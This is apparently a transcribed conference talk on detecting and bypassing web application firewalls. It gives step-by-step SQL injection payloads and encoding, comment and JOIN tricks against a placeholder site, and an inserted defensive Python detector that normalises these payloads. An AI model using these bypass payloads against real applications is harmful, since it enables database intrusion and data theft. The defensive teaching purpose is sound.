General WAF detection and bypassing techniques. The main focus is to demonstrate how to take the right approach to analysing the behaviour of a web application firewall and then create test cases to bypass it.
2. Avinash Kumar Thapa, Senior Security Analyst at Network Intelligence India
Bug Hunter on Hackerone
CTF Author on Vulnhub.com
Some exploits and PoC on Exploit-db as well.
Passionate about Web Applications Security and Exploit Writing.
3. Agenda
Introduction to Web Applications Firewalls
Operation Modes
Vendors
Fingerprinting WAF
Ways to Bypass WAFs
Practical Cases for Bypassing
Conclusion
4. Introduction to Web Application Firewalls
Operates at the application layer.
Monitors all HTTP/HTTPS/SOAP/XML-RPC web service traffic between clients and servers against pre-defined signatures held in a database.
The basic goal of a WAF is to monitor and block content that violates a pre-defined policy.
These pre-defined policies are patterns of user input that end up in a potential attack.
Understands HTTP and HTTPS traffic better than any traditional firewall.
6. Negative Mode
A negative security model recognizes attacks by relying on a database of expected attack signatures.
Example:
Do not allow, on any page, any argument value (user input) that matches potential XSS strings such as <script>, </script>, String.fromCharCode, etc.
Pros:
● Less time to implement.
Cons:
● Less protection.
7. Positive Model
A positive security model enforces positive behaviour by learning the application logic and building a security policy of valid, known requests as a user interacts with the application.
Example:
Page news.jsp: the field id may only accept the characters [0-9], with values starting at 0 and going up to 65535.
Using intval conditions on the page (accepts only integers).
Pros:
● Better performance (less rules).
● Less false positives.
Cons:
● Much more time to implement.
● Some vendors provide an “automatic learning mode”; it helps, but is far from perfect. In the end, you always need a skilled human to review the policies.
13. Fingerprinting WAF
On the basis of HTTP Response
Some WAFs may be detected by the type of HTTP response received when a malicious request is submitted; responses vary from WAF to WAF. Some of the common responses are 403, 406, 419, 500, 501, etc.
23. Example 1 (Without WAF)
https://abc.com/index.php?id=1 ‘
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6
Example 1 (With WAF)
https://abc.com/index.php?id=1 ‘
HTTP/1.1 403 Forbidden
Or
HTTP/1.1 406 Not Acceptable
or
HTTP/1.1 404 Not Found
Or
HTTP/1.1 500 Internal Server Error
Or
HTTP/1.1 400 Bad Request
24. Some recon on WAF
Found that ModSecurity is in use.
https://abc.com/index.php?id=1 “
HTTP/1.1 200 OK
https://abc.com/index.php?id=1 %27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1’ ' at line 6
This technique is URL encoding.
Sometimes you need to use:
1) Double URL encoding: %2527%27’
2) Triple URL encoding: %252525%2527%27’ (this is a very rare case)
25. https://abc.com/index.php?id=1 %27 ORDER BY 1%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• Is the ‘ORDER’ keyword blocked?
• Is the ‘ORDER BY’ keyword blocked?
• Is there any other alternative to the ORDER BY query?
• Are spaces blocked?
Let’s try.
26. https://abc.com/index.php?id=1 %27 ORDER %23
HTTP/1.1 403 Forbidden
Assumptions in mind
• The ‘ORDER’ keyword is blocked
• Check again: is ‘ORDER’ blocked?
https://abc.com/index.php?id=1 %27ORDER%23
HTTP/1.1 200 OK
New assumptions in mind
• The ‘ORDER’ keyword is not blocked
• What is blocked, then?
SPACES ARE BLOCKED
27. https://abc.com/index.php?id=1 %27 ORDER by 1 %23
HTTP/1.1 403 Forbidden
https://abc.com/index.php?id=1 %27ORDERby1 %23
HTTP/1.1 200 OK
No assumptions left: only spaces are blocked.
28. Techniques to bypass spaces
Using ‘+’ instead of a space, e.g. order+by+1 (mostly blocked)
Using inline comments ‘/**/’ instead of spaces, e.g. order/**/by/**/1
Using a combination of inline comments and URL encoding instead of spaces, e.g.:
• Order/%2a%2a/by/%2a%2a/1
• Order%2f**%2fby%2f**%2f1
Using a combination of inline comments, URL encoding and junk characters instead of spaces, e.g.:
• Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1
• Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1
29. Techniques to bypass spaces
Using whitespace characters %0a, %0b, %0c, %0d, %a0, %09, %01
The query becomes:
ORDER%0aby%0a1
ORDER%0bby%0b1
ORDER%0cby%0c1
ORDER%0Dby%0D1
ORDER%A0by%A01
ORDER%0D%0Aby%0D%0A1
31. https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• ‘Spaces’ were bypassed using inline comments… still blocked?
• Is the ‘UNION’ keyword blocked?
• Is the ‘SELECT’ keyword blocked?
• Are ‘Integers’ blocked?
• Are ‘Commas’ blocked?
• The combination “UNION SELECT” is blocked
• “SELECT with Integers” is blocked
32. Techniques to Bypass
Using inline comments:
/*!50000UNION*/
/*!40000UNION*/
/*!00000UNION*/
If UNION is blocked
Using URL encoding techniques:
%53nion
%2553nion
%55%4e%49%4f%4e (UNION)
Double URL encoding
Triple URL encoding
35. https://abc.com/index.php?id=1 %27/**//*!50000UNION*/1,2,3%23
HTTP/1.1 200 OK
https://abc.com/index.php?id=1 %27/**//*!50000SELECT*/1,2,3%23
HTTP/1.1 200 OK
Assumptions in mind
• The ‘UNION’ keyword is NOT blocked.
• The ‘SELECT’ keyword is NOT blocked.
• ‘Integers’ are NOT blocked
• ‘Commas’ are NOT blocked
• Is the combination “UNION SELECT” blocked?
• “SELECT with Integers” is NOT blocked
36. Techniques to bypass the combination “union select”
Using a combination of inline comments and URL encoding:
• /*!50000%55niOn*/ /*!50000%53eLECT*/
Using whitespace characters and the URL-encoded comment marker (#):
• Union%23%0aSELECT
• Union%23%0bSELECT
• Union%23%0cSELECT
• Union%23%0DSELECT
• Union%23%A0SELECT
37. Techniques to bypass the combination “union select”
Using Buffer Overflow
UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT
Sometimes the amount of junk needs to be increased as required:
UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX%0ASELECT
38. Techniques to bypass the combination “union select”
Using Distinct statement
UNION DISTINCT SELECT
Using Distinctrow statement
UNION DISTINCTROW SELECT
41. https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
• The ‘UNION’ keyword is NOT blocked.
• The ‘SELECT’ keyword is NOT blocked.
• ‘Integers’ are NOT blocked
• ‘Commas’ are blocked
• Is the combination “UNION SELECT” NOT blocked?
• “SELECT with Integers” is NOT blocked
Time to bypass commas “,”.
42. Basic Bypasses
URL encoding: , → %2c
Double URL encoding: , → %2c → %252c
Using inline comments /*!*/, e.g. UNION SELECT 1/*!,*/2
44. Advanced way to bypass “Commas”
Using JOIN
JOIN is used for columns in the way UNION is used for rows.
We have SELECT 1,2,3
SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
45. Advanced way to bypass “Commas”
https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23
HTTP/1.1 200 OK
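A defender-side view of slides 24 to 45, added here as an example that is not part of the original deck: every bypass above works because the WAF matches the raw parameter while MySQL sees the decoded, comment-stripped query, so a detection rule should normalise the value the same way before matching. The sample parameter values are constructed to mirror the slide payloads, and the comment and whitespace handling assumes MySQL syntax as the slides describe it.

```python
import re
from urllib.parse import unquote

# Constructed sample parameter values (not captured traffic) mirroring the slide
# payloads; True marks the ones a detector should flag.
SAMPLES = {
    "1%27/**/UNION/**/SELECT/**/1,2,3%23": True,
    "1%27/**//*!50000UNION*//*!50000SELECT*/1,2,3%23": True,
    "1%2527%27%20order%2f**%2fby%2f**%2f1": True,            # double URL encoding
    "1%27UNION%23ABCDEFGHIJ%0ASELECT%201%23": True,           # '#junk\n' separator
    "1%27%20/*!50000%55niOn*/%20/*!50000%53eLECT*/%201,2%23": True,
    "1%27%20UNION%20DISTINCTROW%20SELECT%201,2%23": True,
    "1%27%0aORDER%0bby%A01%23": True,                         # whitespace substitutes
    "42": False,
    "hello%20world": False,
}

# Signatures run against the normalized value, never the raw parameter.
SIGNATURES = [
    re.compile(r"\bunion(?:\s+(?:all|distinct|distinctrow))?\s+select\b"),
    re.compile(r"\border\s+by\b"),
]

def normalize(value: str, max_rounds: int = 3) -> str:
    """Undo the encodings the slides use before signature matching."""
    # Decode until stable so double/triple URL encoding collapses; latin-1
    # keeps single bytes such as %A0 instead of replacing them.
    for _ in range(max_rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    # MySQL reads '#...' to end of line as a comment: 'UNION#junk\nSELECT' runs as 'UNION SELECT'.
    value = re.sub(r"#[^\n]*\n", " ", value)
    # /*!50000UNION*/ executes as UNION on MySQL: keep the body, drop the wrapper.
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    # Any other inline comment (/**/, /*junk*/) is just a separator.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    # Collapse the whitespace substitutes (%09 %0a %0b %0c %0d %a0 %01) to one space.
    value = re.sub(r"[\s\x00-\x1f\xa0]+", " ", value)
    return value.strip().lower()

def is_sqli(raw_value: str) -> bool:
    """True when any signature matches the normalized parameter value."""
    norm = normalize(raw_value)
    return any(sig.search(norm) for sig in SIGNATURES)

def scan(samples=SAMPLES) -> dict:
    """Map each raw sample to the detector's verdict."""
    return {raw: is_sqli(raw) for raw in samples}
```

Without the normalisation step, none of the flagged samples contain the literal string "union select" or "order by", which is exactly the gap the slides exploit.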
46. Similar Approach for other Vulnerabilities
For XSS
For LFI / RFI
DEMO TIME
47. References
Images in slides 10, 11, 14, 15, 16 and 17 taken from
http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYBALOCH.pdf
Thank you..!
Editor's Notes
ISAPI filters are DLLs used to extend the functionality of the IIS server. They are available only on IIS servers.